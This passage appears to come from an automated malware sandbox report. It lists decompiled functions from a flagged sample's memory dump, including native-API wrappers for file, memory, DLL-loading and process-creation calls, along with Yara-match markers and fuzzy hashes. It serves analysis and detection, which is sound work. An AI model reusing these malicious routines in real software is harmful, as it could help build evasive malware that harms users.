				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}







                                                                        0x00418262
                                                                        0x00418263
                                                                        0x0041826f
                                                                        0x00418277
                                                                        0x00418282
                                                                        0x0041829d
                                                                        0x004182a5
                                                                        0x004182a9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                        0x00409b2c
                                                                        0x00409b2f
                                                                        0x00409b34
                                                                        0x00409b39
                                                                        0x00409b43
                                                                        0x00409b48
                                                                        0x00409b4b
                                                                        0x00409b4d
                                                                        0x00409b55
                                                                        0x00409b5a
                                                                        0x00409b5a
                                                                        0x00409b61
                                                                        0x00409b69
                                                                        0x00409b6c
                                                                        0x00409b6e
                                                                        0x00409b82
                                                                        0x00000000
                                                                        0x00409b84
                                                                        0x00409b8a
                                                                        0x00409b3e
                                                                        0x00409b3e
                                                                        0x00409b3e

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                        0x004181bf
                                                                        0x004181c7
                                                                        0x004181fd
                                                                        0x00418201

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}






                                                                        0x0041838b
                                                                        0x0041838d
                                                                        0x0041838e
                                                                        0x00418390
                                                                        0x00418393
                                                                        0x0041839f
                                                                        0x004183a7
                                                                        0x004183c9
                                                                        0x004183cd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                        • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                                                        • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                        • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                        0x0041839f
                                                                        0x004183a7
                                                                        0x004183c9
                                                                        0x004183cd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                        0x004182e3
                                                                        0x004182e6
                                                                        0x004182ef
                                                                        0x004182f7
                                                                        0x00418305
                                                                        0x00418309

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 76c524aee06d93c237d4efb1b41220c2c3c69f76d590b867500da5501d7d23a6
                                                                        • Instruction ID: f1d1ecc56bd682cfab321fe8e2969bc42a45cd14858bb1e80138e436609cd472
                                                                        • Opcode Fuzzy Hash: 76c524aee06d93c237d4efb1b41220c2c3c69f76d590b867500da5501d7d23a6
                                                                        • Instruction Fuzzy Hash: 7B9002B224101402D140719984047460055B7D1351F61C411E9055A58EC6998DD576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d4ac94c8bef32598044c275f84ec8f735c2a30dc71469cfa80d7401203022cfa
                                                                        • Instruction ID: acb4f3625047eb20586c15c3aab679cafd33406b844f96b3c13b8b4747a30f54
                                                                        • Opcode Fuzzy Hash: d4ac94c8bef32598044c275f84ec8f735c2a30dc71469cfa80d7401203022cfa
                                                                        • Instruction Fuzzy Hash: 6A9002A238101442D10061998414B060055F7E2351F61C415E5055A58DC659CC527166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0f8f3de3f9e557615d074446b4fe8a2671f773fbbd82e6270620a111ca7e4a52
                                                                        • Instruction ID: 5c3d2875aaa63e4adeb3aa71f5cc768c93f992f58077aee144e607ca6e2c78c3
                                                                        • Opcode Fuzzy Hash: 0f8f3de3f9e557615d074446b4fe8a2671f773fbbd82e6270620a111ca7e4a52
                                                                        • Instruction Fuzzy Hash: 17900262282051525545B19984045074056B7E12917A1C412E5405E54CC5669856E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ef053700fd9bdd1e5ecc9b17ee3d5f6adb62c54f2f9612e46547949e6dea5553
                                                                        • Instruction ID: 2b21171576730c95ce153073b114188f4c567af798e9f9fd6c673f325cb35f4b
                                                                        • Opcode Fuzzy Hash: ef053700fd9bdd1e5ecc9b17ee3d5f6adb62c54f2f9612e46547949e6dea5553
                                                                        • Instruction Fuzzy Hash: 6A90027224101413D111619985047070059B7D1291FA1C812E4415A5CDD6968952B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2cde287575da5cea033e6af8f2a93dceaac5b4a7c3c504f4d8bfa6d1f3bcc07c
                                                                        • Instruction ID: 0571fbc8eaabfce5551dd834cc0449cc7c054090e199c5a4a6e33088710dc6ca
                                                                        • Opcode Fuzzy Hash: 2cde287575da5cea033e6af8f2a93dceaac5b4a7c3c504f4d8bfa6d1f3bcc07c
                                                                        • Instruction Fuzzy Hash: B690026264101502D10171998404616005AB7D1291FA1C422E5015A59ECA658992B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e050ae3606d3d1281033e0e64e7a3d3399f05683dc2337114916763449a330a6
                                                                        • Instruction ID: cf293a19a21be857e82be057e5b5cd8a0994a15978a83d6512b6523f2da00dee
                                                                        • Opcode Fuzzy Hash: e050ae3606d3d1281033e0e64e7a3d3399f05683dc2337114916763449a330a6
                                                                        • Instruction Fuzzy Hash: 7C90026225181042D20065A98C14B070055B7D1353F61C515E4145A58CC95588616561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: aaa9e7a0c5953e2c8e60fc7bcb6184dd0220ad2c7c72a35455112e67b5e1830e
                                                                        • Instruction ID: bab1878554a5ab873440b1e8d4498adcb698e64de3525afb5282e86daf0f7a42
                                                                        • Opcode Fuzzy Hash: aaa9e7a0c5953e2c8e60fc7bcb6184dd0220ad2c7c72a35455112e67b5e1830e
                                                                        • Instruction Fuzzy Hash: 3790027224141402D1006199881470B0055B7D1352F61C411E5155A59DC665885175B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 46944f73f9b956e1be3692bbd370f5d1abfed6b49daccb305520441c3450ff15
                                                                        • Instruction ID: cc200f07d919ed0a0851dae058b6a53adcd81bd8fbc83d3b64d48b1345057838
                                                                        • Opcode Fuzzy Hash: 46944f73f9b956e1be3692bbd370f5d1abfed6b49daccb305520441c3450ff15
                                                                        • Instruction Fuzzy Hash: 3390026264101042414071A9C8449064055BBE2261761C521E4989A54DC599886566A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7e3cd4adadd0ea6dab553b9536a6919b7e09f011d0770f5ffc6a0f05cf78734e
                                                                        • Instruction ID: 2ed416a2f83520187f9b74da4b2bdef22be17e337516099eb74ca63220932a90
                                                                        • Opcode Fuzzy Hash: 7e3cd4adadd0ea6dab553b9536a6919b7e09f011d0770f5ffc6a0f05cf78734e
                                                                        • Instruction Fuzzy Hash: 5B900266251010030105A59947045070096B7D63A1361C421F5006A54CD66188616161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d90cfcae44c0f32c62596323de7f2380c4a73f26638fd1dc6a28e798d5527df2
                                                                        • Instruction ID: 5f36981518b7652bf65fdcf3f84c953215ce22e3154ee583b12b5a22e2a9e871
                                                                        • Opcode Fuzzy Hash: d90cfcae44c0f32c62596323de7f2380c4a73f26638fd1dc6a28e798d5527df2
                                                                        • Instruction Fuzzy Hash: FD9002A224201003410571998414616405AB7E1251B61C421E5005A94DC56588917165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 94789de24ed9a709c9051733d2563f4b875358365e93d7ccaf8e766cccaaf55e
                                                                        • Instruction ID: 19f3bf514105db3a2e37315cdc3cab89b9d7a93ac9bc21112cc20c523671a461
                                                                        • Opcode Fuzzy Hash: 94789de24ed9a709c9051733d2563f4b875358365e93d7ccaf8e766cccaaf55e
                                                                        • Instruction Fuzzy Hash: 8C90027224101402D10065D994086460055B7E1351F61D411E9015A59EC6A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5e27ea1f874e579ad2f96ba386a053e52b690d8e735e74a621a092c14ce2ae98
                                                                        • Instruction ID: c31adba7ab39000a69aa5530baa20793567e3b3297392b6f60f46a8a42f1233c
                                                                        • Opcode Fuzzy Hash: 5e27ea1f874e579ad2f96ba386a053e52b690d8e735e74a621a092c14ce2ae98
                                                                        • Instruction Fuzzy Hash: 4690027235115402D1106199C4047060055B7D2251F61C811E4815A5CDC6D588917162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 39623cb13753a924d5ee96336b04fd5d9772a8122283923f55423f9c54c2c757
                                                                        • Instruction ID: 4210e3b9e4c8bcaba400c465809426906ce2d1e64f3447786332c417aa1826e6
                                                                        • Opcode Fuzzy Hash: 39623cb13753a924d5ee96336b04fd5d9772a8122283923f55423f9c54c2c757
                                                                        • Instruction Fuzzy Hash: 5390026A25301002D1807199940860A0055B7D2252FA1D815E4006A5CCC95588696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2b891688ba23b9930d5cf6819e3100239edb317b9484a066a34e597f0dc42461
                                                                        • Instruction ID: c146efdd1c98c6cb4ba31277c25d2f5bc2c208e1f69ef841d8b08eaa463174db
                                                                        • Opcode Fuzzy Hash: 2b891688ba23b9930d5cf6819e3100239edb317b9484a066a34e597f0dc42461
                                                                        • Instruction Fuzzy Hash: B190026234101003D140719994186064055F7E2351F61D411E4405A58CD95588566262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e787d76a0cf4aea2218e65eaa13d8555eb469af77efbabe69690af7085c5aaac
                                                                        • Instruction ID: 6d6f00465e483a2c166311f2481c38c40f8d92108541d80b32ad588408a9652b
                                                                        • Opcode Fuzzy Hash: e787d76a0cf4aea2218e65eaa13d8555eb469af77efbabe69690af7085c5aaac
                                                                        • Instruction Fuzzy Hash: 9F90027224101802D1807199840464A0055B7D2351FA1C415E4016B58DCA558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9004a2a5e3da2d686113afc95cebc6710476ef211b4722e57e365643bcd8f994
                                                                        • Instruction ID: 2311735e68e834c5005489ff7dde8c63641954446e9dc397df41ac3de9937c92
                                                                        • Opcode Fuzzy Hash: 9004a2a5e3da2d686113afc95cebc6710476ef211b4722e57e365643bcd8f994
                                                                        • Instruction Fuzzy Hash: E090027224109802D1106199C40474A0055B7D1351F65C811E8415B5CDC6D588917161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                        • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: hA
                                                                        • API String ID: 1279760036-1221461045
                                                                        • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                                        • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                                                        • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                                        • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041852D, Relevance: 3.1, APIs: 2, Instructions: 54processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CreateExitInternal
                                                                        • String ID:
                                                                        • API String ID: 4273315900-0
                                                                        • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                        • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                                                        • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                        • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
